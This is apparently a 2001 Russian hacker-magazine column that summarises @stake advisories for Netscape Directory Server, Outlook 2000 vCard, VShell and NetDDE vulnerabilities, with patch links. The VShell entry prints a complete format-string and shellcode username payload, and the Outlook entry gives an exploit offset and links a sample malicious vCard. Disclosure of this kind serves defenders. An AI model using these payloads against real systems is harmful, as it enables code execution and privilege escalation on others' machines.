BugTraq #4
Xakep, номер #028, стр. 028-010-1
Crazy Nerd, HangUP Team (hangupteam@mail.com), http://hangup.da.ru
Netscape Directory Server 4.1/4.12 Buffer Overflow
Автор: Frank Swiderski
Патчи: www.iplanet.com/downloads/download/0103.html
Система: WinNT
Источник: www.atstake.com/research/advisories/2001/a030701-1.txt
Опасность: краш сервера, исполнение кода
Уязвимость обнаружена в Netscape Messaging Server версии 4.15 SP3, который включает SMTP- и WebMail-сервисы. Переполнение возникает при использовании в RCPT TO: нестандартного имени реципиента (excessive " 0x22 char). Далее SMTP соединяется с Netscape Directory Server для выполнения query. При этом активируется escape_string_with_punctuation() из libslapd.dll, вызывающая еще одну функцию. В результате происходит перезапись стека, с веселыми последствиями.
Microsoft Outlook 2000 v.9.0.0.2711 vCard Buffer Overrun
Автор: Ollie Whitehouse
Патчи: www.microsoft.com/windows/ie/download/critical/q283908/default.asp
Система: WinNT4 SP6a, Win2000
Источник: www.atstake.com/research/advisories/2001/a022301-1.txt
Опасность: выполнение кода
Выполнение кода происходит при открытии Vcard-аттача к письму. Также файл может быть открыт http-обращением:
<a href=http://somesite.com/vcard.vcf>Cool Stuff</a>
Пример vcard-файла: www.atstake.com/research/advisories/2001/Outlook-NT4SP6a-BufferOverflow.vcf
Пример рассчитан на WinNT (SP6a). Сервис-пак является специфичным в силу случайного расположения кода в стеке. EIP не может указывать прямо на код, EAX идет на 4 байта позже. Пример перезаписывает EIP-адресом инструкции JMP EAX (смещение 77BB3923h для SP6a).
Van Dyke Technologies VShell v1.0/1.0.1 Code Execution
Автор: Ollie Whitehouse, David Litchfield
Патчи: доступна новая версия на www.vandyke.com/download/vshell
Система: WinNT4 SP6a, Win2000 SP1
Источник: www.atstake.com/research/advisories/2001/a021601-1.txt
Опасность: выполнение кода как system
Уязвимость этого SSH-гейтвея заключается в способе подтверждения имен пользователей. А именно, VShell страдает от кривого вызова vsprintf() со спец строкой в качестве параметра. Происходит перезапись указателя на адрес последних 8 байт этой строки.
А вот так выглядит useame, позволяющий все это проделать:
(wrapped over 5 lines)
AAAAAAAAAAAAAAAAAAAAAAhppaaX-0@2aP\hAAAAX5AAAAPhSHLLhir>Vh/c dhcm
d Phm`OAX-A0 APh@~aaX-~c 5rynAP\haa00X- 1_PXXXXhe`aAX-A02AP\AhO
%q6X5A..Ahp !xX-2;_050P(0AAAAAAAAAAAAAAA%.887861x%.887861x%.69971
7x%.672498x%.669674x%.669674x%.669674x%.669674x%.669674x%.669674x
%.669674x%.669142x%n"c/
Второй уязвимостью является наличие дефолтового правила (0.0.0.0/0.0.0.0), позволяющего пользователю устроить форвардинг на любой сервис, доступный с гейтвея.
NetDDE Message Vulnerability
Автор: DilDog
Патчи: www.microsoft.com/Downloads/Release.asp?ReleaseID=27526
Система: Win2000 (до первого сервис пака включительно)
Источник: www.atstake.com/research/advisories/2001/a020501-1.txt
Опасность: возможность получения system-привилегий
При запуске Network DDE DSDM service, WINLOGON создает спрятанное окно для межпроцессного взаимодействия с различными NetDDE компонентами. Причем WINLOGON запущен с system-привилегиями. С использованием "DDE Copy Data" можно добиться выполнения команд на system.
